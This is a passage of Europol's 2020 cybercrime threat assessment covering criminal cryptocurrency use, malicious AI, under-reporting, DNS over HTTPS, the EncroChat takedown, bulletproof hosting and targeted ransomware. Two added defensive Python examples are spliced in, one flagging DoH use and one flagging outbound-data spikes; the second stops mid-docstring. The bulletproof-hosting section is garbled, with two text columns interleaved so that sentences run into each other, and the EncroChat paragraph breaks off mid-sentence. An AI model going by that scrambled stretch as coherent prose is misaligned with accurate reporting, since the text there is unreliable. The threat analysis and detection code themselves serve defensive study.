At that time, more than 20% of transactions were directly attributable to criminal activity. Although the level of criminal abuse has grown substantially, the legitimate use of cryptocurrencies grew at a much faster rate. In 2019, the overwhelming majority of bitcoin transactions were linked to investment and trading activity, so, despite considerable abuse, criminal activity corresponds to only 1.1% of total transactions¹². The figure includes transactions stemming from fraudulent activities, Darkweb trade, thefts and ransomware.

Criminals continue to use cryptocurrency as a method of payment for extortion activities

Although Initial Coin Offering scams and a wide range of Ponzi schemes abusing the increasing popularity of cryptocurrencies dominated criminal abuse by volume, most of the crimes reported to law enforcement included various forms of extortion. The last two years have seen an increase in extortion spam, where the suspect attempts to frighten the victim with a promise of a devastating event should they not receive payment in cryptocurrency, typically bitcoin corresponding to hundreds or even thousands of euros. While in its most basic form the suspect simply expects naïve victims to trust the threat, a slightly more advanced approach includes victims’ passwords, typically leaked from one of the large public data breaches. The extortion scam typically involves sextortion, theft of data or, more recently, COVID-19 related threats. While the majority of the population is immune to such attempts, criminals still seem to benefit from the activity. The scalability of cybercrime compared to traditional forms of crime presents a key challenge, as cybercriminals can target a relatively large number of potential victims with relatively low investment, being able to profit despite a small percentage of responses. According to a recent study analysing a subset of 4 million intercepted sextortion emails, over 12 500 bitcoin addresses were extracted, 245 of which received one or more payments¹³. Although such efficiency is much lower than observed across ransomware campaigns, it is still much more lucrative when compared to traditional low-tech scams.

Cryptocurrency users also target of criminals

The growing adoption of cryptocurrencies increases the number of vulnerable victims, so it is no surprise that thefts from individual and enterprise wallets have become more prominent over the last few years. In 2019, there were 10 publicly confirmed hacks of exchanges where criminals stole cryptocurrencies, resulting in a theft of €240 million worth of assets. Although the number of incidents was higher than in any of the previous years, the total amount stolen decreased compared to the previous year, with €950 million stolen in 2018, including almost €500 million stolen from Japanese exchange Coincheck¹⁴.

Cooperation with the private sector

While a massive effort has taken place in the cryptocurrency industry to deal with proceeds from criminal activities, the exchanges still differ in the degree to which they address the issue and the level of assistance they provide to investigators. In order to assess the players across the industry, Europol is conducting the first international law enforcement survey¹⁵ addressing the issue of cooperation with the major cryptocurrency exchanges and payment services.
The cryptocurrency industry and exchanges in particular have continued strengthening their know your customer (KYC) measures, either through their increasing effort to identify rogue clients or by a growing set of legislation affecting the industry.

In Europe, the most important legislative development in this area was a transposition of the 5th Anti-Money Laundering Directive. The Directive states that cryptocurrency exchanges and wallet providers who own private keys of their clients are obliged entities, mandating them, among other things, to a proper identification of their clients. The Directive obliges all European Union Member States to implement the legislation by January 2020. Twenty countries have implemented it on time¹⁶, with more doing so throughout this year. While individual countries were given a large degree of flexibility when transposing the Directive, this development contributed to a much-needed harmonisation of legislation.

The number of cryptocurrency automated teller machines (ATMs) is continuously growing and surpassed 9 000 ATMs around the world in 2020¹⁷. Traditionally, ATMs have often been perceived as a way to privately obtain or sell cryptocurrency. Nevertheless, compliance also gradually improves, as an increasing number of operators require customer identification and flag suspicious transactions.

Challenges to feature more prominently in future investigations

A large number of factors have rendered cryptocurrency investigations more challenging and we can expect these to feature more prominently in future investigations. These include centralised and decentralised mixing services, privacy coins, exchanges with insufficient KYC requirements, clandestine over-the-counter trading, nested services, where the exchange is incorporated within a wallet or another service, and decentralised exchanges.

The obfuscation methods continue to develop. Centralised mixers troubled with exit scams and high fees seem to be gradually replaced by non-custodial mixing solutions where users do not need to send bitcoins to a third party. Privacy-focused services aside, the bitcoin protocol itself is expected to soon implement features that will make it less transparent to casual observers and investigators alike.

Cybercriminals will increasingly turn to marketplaces that support decentralised transactions. More marketplaces are likely to deprecate the traditional centralised model with deposit and escrow accounts in favour of direct transactions between buyers and sellers, decreasing the influence of market administrators and discouraging exit scams.

Looking ahead: Malicious use of artificial intelligence

Artificial intelligence (AI) is at the heart of the so-called 4th industrial revolution and promises greater efficiency, higher levels of automation and autonomy. AI is intrinsically a dual use technology: while it can bring enormous benefits to society, AI can also enable a range of digital, physical and political threats. Therefore, the risks and potential criminal abuse of AI systems need to be well understood in order to protect against malicious actors.

For instance, criminals could make use of AI to facilitate and improve their attacks by maximising opportunities for profit in a shorter time, exploiting new victims, and creating more innovative criminal business models, while reducing the chances of being caught. As ‘AI-as-a-Service’ becomes more widespread, it lowers the entry barrier to criminal activities by reducing the skills and technical expertise needed to employ it. This further exacerbates the potential for AI to be abused by criminals and become a driver of crime. Concrete scenarios include AI malware, AI-supported social engineering, AI-based password guessing, AI-aided reconnaissance or AI-facilitated content creation, to mention a few.

It is therefore necessary, in close cooperation with industry and academia, to develop a body of knowledge on the potential use of AI by criminals with a view to better anticipating possible malicious and criminal activities facilitated by AI, as well as to prevent, respond to, or mitigate the effects of such attacks in a pro-active manner. Understanding of capabilities, scenarios, and attack vectors is the key to enhancing preparedness and increasing resilience.

Cryptocurrency as an investigation opportunity

Cryptocurrency investigations have become an essential tool for many cybercrime investigators. While the role of Europol is to support investigations in the Member States, we could no longer ignore a high demand for relevant practical training. To cope with an increasing demand for a hands-on e-learning experience, Europol in cooperation with CENTRIC launched CRYPTOPOL, an educational game for investigators, in October 2019. CRYPTOPOL is accessible to all law enforcement cryptocurrency investigators around the world, who can contact Europol to request access to the game. As the game contains information about tracing techniques used by law enforcement, there is no intention of making it publicly available.

1.5 CHALLENGES WITH REPORTING PLAGUE ABILITY TO CREATE ACCURATE OVERVIEW OF CRIME

Several interviewees indicated how they are unable to provide a comprehensive overview of the number and types of crimes executed within a particular crime area. This is the result of a number of factors. First, the ability to register a specific crime is not always possible. Crime registration systems are diverse, and several interviewees indicated they were in a process of advancing their ability to gather more specific crime reporting data, i.e. specifying what type of cybercrime took place. In one Member State, ransomware, for example, was not a separate category, as the country maintains a general category for data breaches. Having a general code for data breaches led to classification problems, according to the Member State representative, as different types of crimes fall into the same category.

Second, victims often do not report the crime. Crime reporting is a general problem and as such receives attention as part of a broader Victim Rights Strategy¹⁸. Victims may not see the value of doing so, as law enforcement have limited resources to conduct investigations. Yet, reporting the crime can also help law enforcement in its quantitative justification to support the request for more resources. Moreover, the more victims report a crime, the more data law enforcement can gather and the more likely connections between different crimes can be established. One of the interviewees indicated how under-reporting prevents law enforcement from forming the bigger picture and gathering reliable data, and monitoring whether cybercrime has been increasing or decreasing in reality.

The other explanation for a lack of reporting from victims, at least with respect to the general public, is a lack of awareness. One interviewee indicated having witnessed a significant increase in cybercrime figures, but offered as an explanation that it may in fact be the result of greater awareness from the public. Others indicated there is no incentive to report as the focus is on business continuity.

Third, law enforcement at a national level often find out about a potential case through the media or through their local police. Crime registration at local police level maintains its own challenges, as local police units may not have the expertise to assist a victim of cybercrime. Additionally, the information reported to local police may not find its way to national or central units, meaning law enforcement is unable to connect the dots on a national scale and with their respective international partners.

Cybercrime in the media

Law enforcement officials also indicated using media as a source of crime reporting, which is not the preferred method as such reporting maintains its own challenges. Cybercrime is a complicated area filled with technical elements and cross-cutting issues, which make it difficult to create a clear picture of the landscape. A lack of understanding of key terms, concepts and a limited viewpoint have shaped the way mainstream media have portrayed cybercrime to wider audiences. Sophisticated emerging technologies, human-relatable narratives, and high-profile cases (vis-à-vis victims or perpetrators) tend to dominate media headlines.

The complexity and terminological challenges of cybercrime can lead to inconsistencies between what the media reports and what the security community says about an incident. It is also not helpful that many companies name the same groups or attacks differently, enhancing the potential confusion. The complexity can lead to the perception of cybercrime as a highly sophisticated and intelligent field of crime. However, while for some cases this is an accurate assessment, this perception may lead to neglect of the human element of cybercrime, which is much less complex to comprehend. Additionally, there are many forms of cybercrime which are relatively unsophisticated, but which have substantial impact nonetheless. Cybercrime has a genuine human impact and individuals can do a lot to improve their resilience against different kinds of cyber threats if they are aware of them. Reporters may lack a coherent understanding of the cybercrime field, often mixing cyber-enabled fraud with cyber-dependent crime.

Where a high-profile incident occurs, an excessive focus on such cases may lead to indirect re-victimisation and, in some cases, directly casting blame on the victim, which harms investigations. Law enforcement view the media highlighting the more dramatic cases, while often ignoring the low-value but high-volume cybercrime. When victims are essentially the only possible source of information in criminal cases, they are not likely to be willing to share information on their victimisation. This is particularly true with BEC and ransomware. Media reporting can turn the incident into a scandal story, which could lead to further victimisation and reputational damage.

Using media for awareness raising

According to law enforcement and private sector respondents, due to the receptive nature of several media outlets, there is substantial room to work collaboratively with media to raise awareness of neglected areas of cybercrime which have a substantial impact on EU citizens. There are extensive calls to have clearer, more accurate representation of cybercrime to public audiences. Law enforcement are calling for prevention to be covered more extensively. If done right, the media could become a powerful actor in cybercrime prevention, for example by exposing the adoption of new kinds of technologies and methods by cybercriminals.

Law enforcement has reported good reception among media representatives in raising awareness of concrete cybercrime issues. Active presence on social media by law enforcement, and sending out notices on cybercrime, is often well received by media and the public¹⁹. The media often picks up and shares the story.

This is important, as, for example, phishing and social engineering attacks rely on convincing humans to fall for fraudulent activities, which makes raising awareness on these threats potentially more impactful than focusing on disseminating high-profile incidents. As national media outlets often spearhead media reporting in Member States, it would be important for the public and private sectors to engage with them regularly, raise awareness and communicate elaborately the realities of the threat landscape, which could help boost resilience against threats. People usually report crimes more after certain information is disseminated on threats.

[Infographic: You hold the cards! Report online crime 24/7: increase your chances of getting help; dissuade the offenders from performing more crimes; help law enforcement catch the criminals; protect others from becoming victims. Report cybercrime; report illegal content; report child sexual coercion and extortion.]

1.6 LAW ENFORCEMENT ACCESS TO DATA CONTINUES TO CHALLENGE INVESTIGATIONS

For several years now, the advancement and increased implementation of certain technological developments have complicated the ability of law enforcement to gain access to and gather relevant data for criminal investigations. One of the most prominent examples in this regard remains the widespread use of encryption, which contains many benefits from a security perspective but is also a development that criminals have gratefully used to their advantage²⁰. Europol has spoken about this in previous iterations of the IOCTA and jointly with Eurojust in its dedicated Observatory Function reports in 2019 and 2020.

Encryption continues to become a mainstream feature of an increasing number of services and tools. One example is the Domain Name System (DNS) over Hypertext Transfer Protocol Secure (HTTPS). DNS is one of the most important databases in the internet infrastructure. Increased concern over the monitoring of DNS traffic has led to the standardisation of modern DNS resolution protocols that make use of encryption. One of the protocols which received increased popularity and adoption is DNS over HTTPS (DoH), after being introduced as a default setting on the application level. Even though the DoH protocol was created to solve historical DNS concerns regarding security and privacy, the potential centralisation of DNS traffic around a handful of commercial and private organisations has arisen as a result. Tracing historical DNS records is an effective tool when it comes to criminal investigations. Access to DNS queries is also used to great effect in dealing with botnets. Access to the network traffic between the criminal source and the remote DNS service provider, however, will now barely be possible due to traffic encryption, which will make the detection and blocking of malicious traffic, botnets and other malicious applications impossible.

As queries to the DNS will be encrypted, the ability to gain access to such data will be more complicated for law enforcement, and countries hosting the majority of the DoH service providers will receive the vast majority of the internet DNS lookups, compared to the previous national decentralisation of these sensitive queries.

As a consequence of this, most of the DoH-related investigations will involve international legal requests to those jurisdictions. The DoH provider is likely to have a privacy policy in place, which will make it even more difficult for law enforcement to receive the necessary information for crime investigations. Finally, while positioned as a privacy-enhancing technology, it still allows internet service providers (ISPs) to profile users, as other data points of the Hypertext Transfer Protocol (HTTP) traffic remain unencrypted.

Other related developments include the use of cryptocurrencies by criminals, as indicated earlier in this chapter. Whereas law enforcement, including Europol, continues to focus on improving capabilities in the area of cryptocurrency tracing, significant challenges remain.

Encrochat investigation provides new insights into organised crime

The value of being able to access data of criminal communication becomes most apparent when law enforcement succeeds in gaining such access. The case of Encrochat, an encrypted phone network widely used by criminals, is perhaps the most effective illustration of how encrypted data can provide law enforcement with crucial leads beyond the cybercrime area. It should be emphasised that the platform targeted by this investigation catered specifically to the needs of criminals. The phones using the platform were provided pre-configured and advertised to meet the needs of criminals and to secure the users against surveillance or investigation methods used by law enforcement parties. The phones are sold guaranteeing anonymity, utilising a network of re-sellers, which are often themselves involved in other criminal activities, and are not distributed via regular retail outlets. In early 2020, EncroChat was one of the largest known providers of encrypted digital communication, with a very high share of users engaged in criminal activity. User hotspots were particularly present in source and destination countries for cocaine and cannabis trade, as well as in money laundering centres. In July 2020, Europol reported on a joint investigation which made it possible for law enforcement to intercept, share and analyse millions of messages that criminals exchanged to plan serious crimes.

While the activities on EncroChat have ceased, this complex operation shows the global scope of serious and organised crime and the connectivity of criminal networks who use advanced technologies to cooperate on a national and international level. The information has already been relevant in a large number of ongoing criminal investigations, resulting in the disruption of criminal activities including violent attacks, corruption, attempted murders and large-scale drug transports. Certain messages indicated plans to commit imminent violent crimes and triggered immediate action.

This investigation confirms that advanced technologies enable criminals to secretly communicate or transfer illicit goods and resources. There is a growing risk to public safety as organised crime are drawn to using encrypted communication platforms that are almost technically impossible for law enforcement to access. Due to these emerging technologies used by criminals and the opportunities new technology may pose for law enforcement, an even more intense thinking beyond law enforcement cooperation is required, including with the private sector.

While the dismantling of EncroChat is a considerable success against serious and organised crime and the result of a multi-national investigation, the ingredients needed to come to such a success include the ideal

As an infrastructure element, BPH facilitates a broad variety of key threats, including CSAM, terrorism-related content, command and control (C&C) servers used in cyber-attacks as well as platforms for criminal-to-criminal trade and discussion²¹. It is linked to several threats in cyber-dependent and cyber-enabled crime, making it a key concern in the threat landscape. As such, both the private and public sectors have a key role to play in hindering a BPH criminal application. This calls for cooperation internationally, as well as an appropriate legislative framework which would hinder BPH providers from acting maliciously by hosting criminal interests. For example, regional internet registries, local internet registries and ISPs have a significant responsibility in maintaining data accuracy when sub-allocating IP addresses to network operators in order to maintain traceability with regard to combatting BPH, as IP addresses have a substantial role in BPH.

BPH providers may run their own static servers to host malicious content of their clients. BPH services have also registered as resellers with low-end service
combination of information, resources, skills, partners providers (for example ISPs, large hosting providers
and opportunity. This means this type of success is and content delivery networks) due to low-level
an exception as the rule remains that law enforcement verification and authentication requirements. With the
continues to battle the challenges of criminal use of growth of cloud services, a new modus operandi has
advanced technologies. emerged in which threat actors rent virtual private
servers from legitimate hosting providers using fake or
stolen identities. This highlights the need for stronger
Bulletproof hosters are the backbone of KYC policies with businesses and organisations
criminal infrastructure across the sector.

An important building block of the criminal


infrastructure is bulletproof hosting (BPH) – an
essential CaaS offering, which continues to be a
crucial facilitator for criminals and a hindrance for
law enforcement by challenging identification and
attribution efforts. BPH refers to a type of hosting or
Case example
hosting provider that earns its money by consciously
accepting perpetrators of crime as part of its clientele, In September 2019, German law
offering them technical infrastructure resilient to law enforcement managed to identify
enforcement disruption or takedown. There are some and arrest the main suspect running
hosting providers who may be negligent in acting on a BPH service from a bunker. This
illegal content or criminal activity hosted by them, BPH facilitated illicit marketplaces for
which is also an area of concern for law enforcement; various kinds of drugs, CSAM and CaaS.
however, the hosting providers that consciously act in Specifically, the WallStreet Market and
or support the interest of the criminals ought to be the Flugsvamp 2.0 were able to run on the
primary focus. These providers make their willingness servers of the bunker in Traben-Trarbach,
to support criminal activity part of their appeal and Germany22.
their business model. This is a crucial advantage for
criminals as hosting providers can play a central role
in allowing criminal activity to continue.
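The DoH discussion at the start of this section makes the point that encrypted resolver traffic removes the inspection and blocking point that plain DNS used to offer. One way for a network defender to keep some visibility is to work from connection telemetry rather than DNS logs: a host that opens TLS sessions to a public DoH resolver and never talks to the internal resolver has moved all of its lookups out of view. The Python below is an added example and is not part of the IOCTA text or of any Europol tooling; the connection records, the internal hosts and the internal resolver address 10.0.0.53 are constructed, and cloudflare-dns.com and dns.google are real public resolver names used only to illustrate the SNI values to watch for.

```python
"""Make DNS-over-HTTPS (DoH) use visible from connection telemetry: an endpoint
that talks TLS to a public DoH resolver but never asks the internal resolver
has moved its DNS out of the organisation's view."""
from collections import defaultdict

# Public DoH resolver hostnames. cloudflare-dns.com and dns.google are real
# public services, listed here only as examples of the SNI values to watch for.
KNOWN_DOH_SNI = {"cloudflare-dns.com", "dns.google"}

# Assumed address of the organisation's own recursive resolver (constructed).
INTERNAL_RESOLVER = "10.0.0.53"

# Constructed connection records in the shape of a Zeek conn/ssl join
# (not real traffic): (source IP, destination IP, destination port, TLS SNI).
SAMPLE_CONNECTIONS = [
    ("10.0.0.5", "10.0.0.53", 53, ""),
    ("10.0.0.5", "203.0.113.10", 443, "www.example.com"),
    ("10.0.0.7", "1.1.1.1", 443, "cloudflare-dns.com"),
    ("10.0.0.7", "203.0.113.10", 443, "www.example.com"),
    ("10.0.0.9", "10.0.0.53", 53, ""),
    ("10.0.0.9", "8.8.8.8", 443, "dns.google"),
    ("10.0.0.9", "8.8.8.8", 443, "dns.google"),
]


def classify_doh_use(connections, doh_sni=KNOWN_DOH_SNI,
                     internal_resolver=INTERNAL_RESOLVER):
    """Return {source_ip: {"doh_resolvers": {sni: count}, "bypass": bool}}.

    bypass=True means the host reached a DoH resolver and never used the
    internal resolver, i.e. every lookup it made is invisible to DNS logging.
    bypass=False means only some software on the host (typically a browser
    with its own DoH setting) is resolving outside the organisation."""
    doh_hits = defaultdict(lambda: defaultdict(int))
    uses_internal = set()
    for src, dst, dport, sni in connections:
        if dport == 53 and dst == internal_resolver:
            uses_internal.add(src)
        elif dport == 443 and sni in doh_sni:
            doh_hits[src][sni] += 1
    return {
        src: {"doh_resolvers": dict(per_sni), "bypass": src not in uses_internal}
        for src, per_sni in doh_hits.items()
    }


def summarise(report):
    """One line per flagged host, ready for a ticket or a SIEM note."""
    lines = []
    for src in sorted(report):
        entry = report[src]
        resolvers = ", ".join(f"{sni} x{n}"
                              for sni, n in sorted(entry["doh_resolvers"].items()))
        status = "bypasses internal DNS" if entry["bypass"] else "partial (some apps only)"
        lines.append(f"{src}: DoH to {resolvers}; {status}")
    return lines


if __name__ == "__main__":
    for line in summarise(classify_doh_use(SAMPLE_CONNECTIONS)):
        print(line)
```

The check keys on the TLS server name, so it is blind to clients that reach a DoH endpoint by IP address only or that hide the name with encrypted ClientHello; in practice it is paired with a list of resolver IP addresses and with the same treatment for port 853 (DNS over TLS). The output is an inventory, not a verdict: a host marked "partial" usually has a browser setting to correct, while a host marked "bypasses internal DNS" deserves a closer look.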
2 CRIME PRIORITY

Cyber-dependent crime

KEY FINDINGS

• Ransomware remains the most dominant threat as criminals increase the pressure by threatening publication of data if victims do not pay.
• Ransomware on third-party providers also creates potential significant damage for other organisations in the supply chain as well as critical infrastructure.
• Emotet is omnipresent through its versatile use as it leads the way as a benchmark of modern malware.
• The threat potential of DDoS attacks is higher than its current impact in the EU.
2.1 INTRODUCTION

The clear majority of law enforcement respondents named ransomware as a top priority threat yet again. As reported in previous years’ IOCTA reports, ransomware remains one of the, if not the, most dominant threats, especially for public and private organisations within as well as outside Europe. Besides ransomware, European law enforcement reported malware in the broader sense to be widely present in cybercrime cases. Malware attacks on organisations that play a crucial role in the supply chains of major organisations have been a significant development over the past year. The third threat, the DDoS attack, celebrated its 20th anniversary in 2019, and ongoing investigations show that the DDoS threat is still prevalent in the cyber landscape.
2.2 RANSOMWARE

The clear majority of law enforcement respondents named ransomware as a top priority threat yet again. As reported in previous years’ IOCTA reports, ransomware remains one of the, if not the, most dominant threats, especially for public and private organisations within as well as outside Europe. What makes it even more challenging as a threat is the impact it has on its victims. This victimisation goes beyond the primary target, most often a public organisation or private business, as ransomware also affects those whose data is compromised. Considering the scale of damage that ransomware can inflict, victims also appear reluctant to come forward to law enforcement authorities or the public when they have been victimised, which makes it more difficult to identify and investigate such cases. With ransomware, criminals not only abuse encryption to hide their identity and obfuscate their financial transactions, but also actively abuse encryption as part of their modus operandi. This leads to a situation where they can almost act with impunity.

Ransomware is becoming increasingly targeted

Criminals continued the trend introduced last year by making their ransomware attacks increasingly sophisticated and more targeted. The number of targeted ransomware cases has increased over the past year, which has led to a significant increase in threat actor capability as well as a higher impact on victims.

Ransomware attackers continue to target public and private sector organisations of various sizes, industries and nationalities rather than individual personal computers (PCs). This enables threat actors to increase both the ransom amount requested and the probability of successfully making the victim pay the ransom. Victim reconnaissance plays a significant role in the preparation of an attack. European law enforcement and Europol have observed attacks targeting local governments and ministries; other public sector organisations in healthcare and education (including hospitals, universities and high schools); as well as businesses in the manufacturing, finance, energy and transport industries. While the context of the COVID-19 pandemic crisis has affected the cybercrime field, ransomware attacks targeting the healthcare industry took place well before the crisis had a substantial effect in Europe and the US, which suggests that the COVID-19 crisis was not a trigger for these kinds of attacks23. What COVID-19 brought was an increase in the attack surface, with unmanaged endpoints/devices (PC systems) being remotely connected and having access to companies’ information technology (IT) infrastructure. The fast shift to telework made some companies ‘alleviate’ some of their IT security policies, and some IT security responsibility has been transferred to individual users, where varying levels of (or lack of) associated security training have created a new gap in security. This gap has subsequently provided new ways for cyber-actors to gain access to companies’ IT infrastructure.

Typically, ransomware attacks deployed against large corporations occur in different stages and are executed by different threat actors. The initial step of a ransomware infection (performed by one group of criminals) is the computer/network intrusion, which is done using multiple attack vectors and malware types. The access is then sold to different cybercriminals who perform IT infrastructure mapping, privilege escalation, lateral movement, data exfiltration etc., finalised by deploying the ransomware.

Ransomware and third-party providers form a lethal combination

Ransomware has been shown to pose a significant indirect threat to businesses and organisations by targeting supply chains and third-party service providers. Europol has followed up on attacks on organisations playing a key role in the supply chains of major financial institutions, which are believed to be an attempt by the attackers to enhance pressure on the victim to pay the ransom. Private sector respondents reported concerns over the differences in the IT security apparatus across supply chains, which leaves companies that play a key role as a service provider vulnerable to attacks. These attacks then have an impact across the whole supply chain, which may do substantial damage through long downtime or information leaks for organisations indirectly affected by the attack. One case saw an IT service provider attacked with Maze ransomware, which can sit on the victim’s servers for several months. This allows criminals to perform reconnaissance by monitoring internal communications in order to identify a key moment, such as a merger, a sale or big meetings with customers/sales, for the deployment of the ransomware. Criminals deploy the ransomware before such events with the aim of putting pressure on the victim. At the same time, criminals can also exfiltrate the data prior to the deployment of the ransomware to have another means of pressuring the victim. The existing presence of the criminals on the victim’s servers is difficult for security investigators to identify, as security measures mainly focus on inbound detection.

A perverse twist to guarantee payment: threatening to auction or wipe data

Ransomware attackers have introduced a new way of pressuring their victims to pay: stealing the victim’s sensitive data and threatening to publish it online. Once criminals gain a foothold on victims’ networks, which can be done in various ways, they explore the networks and exfiltrate data before delivering the ransomware. If the victim fails to pay the ransom demand, attackers will post the victim’s sensitive data online or sell it to the highest bidder. The group behind Sodinokibi ransomware has already attempted to auction data which it gathered from a ransomware attack24. According to Member States and private sector respondents, several ransomware families including Sodinokibi (also known as REvil), Maze, Doppelpaymer, Nemty and Snatch published data which criminals stole from their victims over the past year. In particular, the auctioning of the data by criminal groups marks a new step and demonstrates an escalation in methods aimed at coercing victims to pay the ransom. It is anticipated that other groups will begin to adopt these coercive measures too.

Additionally, in the 2018 IOCTA Europol predicted scenarios in which fines for violating the GDPR could be used by threat actors as additional leverage with regard to the threat of leaking their victim’s data online25. Both Member States and private sector respondents witnessed this phenomenon over the past year. Some ransom notes specifically mention GDPR fines to enhance the pressure on victims.

Fig. 1 A screenshot of a data auctioning session online26.

An alternative to the publication of data is its destruction. Some ransomware families, such as NotPetya, have destructive wiper functionalities which may cause irreversible damage to the victim. Europol observed a case of destructive malware which took place in 2020, in which attackers managed to rewrite the master boot record.

Investment costs for criminals increase, but so do the potential profits

While the overall investment cost of ransomware is increasing, the amounts extorted by attackers have increased too. Attackers who launch ransomware attacks have requested ransoms of anywhere between less than a thousand and millions of euros. The damages caused by e.g. downtime have increased significantly as well. When targeting their victims, European law enforcement found attackers surveying their victims and assessing both the victim’s capacity
to pay (by reading e.g. financial reports) and the most effective way of infecting as many machines as possible during the attack. Attackers have also used encrypted communication means (such as Protonmail, Tutanota and cock.li) and set up customer service portals – many times a hidden service on the Tor darknet – to help facilitate the extortion process.

Ransomware attackers are becoming increasingly innovative in pursuing profits from the crime area. In addition to shifting to corporate and organisational targets and finding new ways of adding leverage to their extortion, threat actors are seen collaborating with other criminals and adding new layers to their attacks, including crypto mining. Increasingly professional affiliate schemes are reflected in the increase in migration among criminal affiliates, as was seen with the migration from GandCrab to Sodinokibi.

Ransomware attacks display higher skill, sophistication and adaptivity among threat actors

Ransomware attacks continue to be a relatively diverse, low-risk and easy way for cybercriminals to acquire money. The level of sophistication also varies across threat actors. European law enforcement reported at least two distinct types of ransomware actors: lone actors who utilise data and services from Darkweb marketplaces, who demand ransoms of up to five thousand euros; and well-organised crime groups with better technical capabilities targeting higher-value targets for ransoms of up to millions of euros. Threat actors have displayed significant adaptability in conducting lateral movement and reconnaissance and in establishing new footholds. Several stages are still executed through more manual steps (and again by using legitimate tools), where a lack of strong internal controls and logging does not expose and reveal the suspicious activities. The availability of Ransomware-as-a-Service (RaaS) on Darkweb marketplaces has also lowered the barrier of entry for new, less skilful criminal actors. Lockbit, for example, which emerged in January 2020, was brokered on underground forums for other cybercriminals to use27. On the opposite side, however, already established and mature RaaS actors have raised the bar by admitting only trusted affiliates into their affiliate programmes. These trusted affiliates have previously displayed the capacity to infect large companies. Affiliates that cannot infect large companies or are inactive on the platform for more than one week are expelled (e.g. Sodinokibi).

The business-type nature of ransomware attackers is also demonstrated in their engagement in online public relations activities. Some ransomware groups conduct their own information campaigns to advance their goals. The Maze ransomware group, for example, released a statement on their website claiming that they would ‘spare’ healthcare organisations during the COVID-19 pandemic crisis. This turned out to be disinformation, as the group allegedly attacked an urgent care centre in Texas soon after their release (with the centre refusing to pay the ransom, Maze continued to publicise stolen patient data)28. The Maze group was also allegedly behind an attack on the Hammersmith Medicines Research facility in the UK, which has been involved in developing vaccines for the COVID-19 virus29.

Both Member States and private sector respondents have noticed an increase in subcontracting and cooperation among threat actors, which has improved their capabilities. Similarities in how the criminals behind the trio of Ryuk ransomware, Trickbot and Emotet malware operate suggest that criminals across different attack approaches either belong to the same overall structure, or are becoming smarter at cooperating with each other. Well-organised criminal groups who engage in ransomware have been observed by European law enforcement cooperating over malware, infrastructure and money laundering activities. The relationship between Emotet, Ryuk and Trickbot is considered one of the most notable in the cybercrime world.

Some ransomware actors have also grown more cautious. Member States and private sector respondents reported that some of the actors behind ransomware attacks have become less vocal on underground forums, setting up alerts and alarms. They have also been observed using additional VPN layers and cryptocurrencies with mixers and swappers to hide their tracks. According to European law enforcement, attackers have also found a way of using C&C servers when deploying malware to place the payload into the memory of the company’s servers. This way there is no trace on the victim’s hard disk and no way of recreating it once it is gone from memory. The IOCTA 2018 and 2019 include a section on file-less malware as an emerging threat in cyber-dependent crime, and the IOCTA 2018 included a forecast that file-less malware would become an increasingly standard component of CaaS offerings by 2023.

Ransomware remains an under-reported crime

Several law enforcement authorities mentioned identifying ransomware cases through (local) media and approaching victims to assist them by potentially starting a criminal investigation. This was not generally a priority of the victim organisation, as the primary focus was on business continuity and limiting reputational damage (see Chapter 1). The shift in ransomware targeting from individual PCs to higher-value targets such as businesses and public sector organisations introduces unique challenges to law enforcement investigations. Private and public sector victims of ransomware are disproportionately more affected by the threat of leaking data compared to ransomware cases in which PCs and individual persons were affected. Negative publicity leading to reputational fallout may lead to re-victimisation, which may prevent victims from coming forward to law enforcement authorities with information which could be crucial in identifying and catching the perpetrators. Victims prefer to engage with private sector security firms to investigate the attack or negotiate with the extortionists in order to manage the crises triggered by ransomware (some IT security firms hire specialist negotiators, some of whom get discounts from organised crime groups). Some of the companies that negotiate the ransom payment are working on the edge of legality, as they have developed a trusted business relationship with the ransomware actors.

Companies are normally referenced by cybercriminals in their negotiations as a proof or ledger that the victim’s data will be decrypted after the ransom payment. Some of these companies negotiate behind the scenes with the ransomware actors to obtain a bigger discount on the ransom payment. Some companies might reflect this discount in the victim’s invoice, others may not. Cyber actors provide ransom discounts to victims if they use the services of specific companies. By using such companies, victims will not file an official complaint, which increases the lack of visibility and awareness among law enforcement concerning the real figures of ransomware attacks. Not reporting cases to law enforcement agencies will obviously hamper any efforts, as important evidence and intelligence from different cases can be missed.

Furthermore, a case involving personal computers being targeted by ransomware shows that victims had opted to purchase new machines rather than report the event to law enforcement. Here victims were stunned when they were contacted by law enforcement over the ransomware attacks, and were under the impression that law enforcement would not do anything about the situation.

Ransomware TIPS & ADVICE

THE MALWARE THAT HOLDS YOUR DATA HOSTAGE FOR A PRICE

Ransomware prevents users from accessing their system or devices, asking them to pay a ransom through certain online payment methods by an established deadline in order to regain control of their data.

HOW DOES IT SPREAD?

• Visiting compromised websites
• Clicking on malicious links and attachments
• Downloading fake application updates or compromised software
• Connecting infected external devices (such as USBs) to your computer system
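Two observations in the ransomware section above, that crews exfiltrate data before they encrypt and that their presence is hard to spot because controls focus on inbound detection, translate into a concrete defensive check: baseline each host’s own outbound volume and alert on the day it jumps, listing any destination the host has never sent to before. The Python below is an added example, not code from the report; the daily flow summaries, host names and addresses are constructed, and the 5× threshold and three-day minimum history are assumed tuning values.

```python
"""Baseline each internal host's daily outbound volume and flag the day it
jumps far above its own history, surfacing bulk exfiltration that inbound-
focused controls never see."""
from collections import defaultdict
from statistics import median

# Constructed daily flow summaries (not real data):
# (day, internal host, external destination, bytes sent outbound)
SAMPLE_FLOWS = [
    ("2020-03-01", "fileserver01", "203.0.113.20", 40_000_000),
    ("2020-03-02", "fileserver01", "203.0.113.20", 45_000_000),
    ("2020-03-03", "fileserver01", "203.0.113.20", 38_000_000),
    ("2020-03-04", "fileserver01", "203.0.113.20", 42_000_000),
    # ~5 GB in one day to an address this host has never talked to before
    ("2020-03-05", "fileserver01", "198.51.100.77", 5_000_000_000),
    ("2020-03-01", "ws-hr-12", "203.0.113.20", 1_000_000),
    ("2020-03-02", "ws-hr-12", "203.0.113.20", 1_200_000),
    ("2020-03-03", "ws-hr-12", "203.0.113.20", 900_000),
    ("2020-03-04", "ws-hr-12", "203.0.113.20", 1_100_000),
    ("2020-03-05", "ws-hr-12", "203.0.113.20", 1_050_000),
]


def daily_egress(flows):
    """Aggregate to host -> day -> bytes and host -> day -> {destinations}."""
    bytes_by_day = defaultdict(lambda: defaultdict(int))
    dests_by_day = defaultdict(lambda: defaultdict(set))
    for day, host, dst, nbytes in flows:
        bytes_by_day[host][day] += nbytes
        dests_by_day[host][day].add(dst)
    return bytes_by_day, dests_by_day


def find_egress_anomalies(flows, factor=5.0, min_history=3):
    """Return one alert per (host, day) whose outbound bytes exceed `factor`
    times the median of that host's earlier days.

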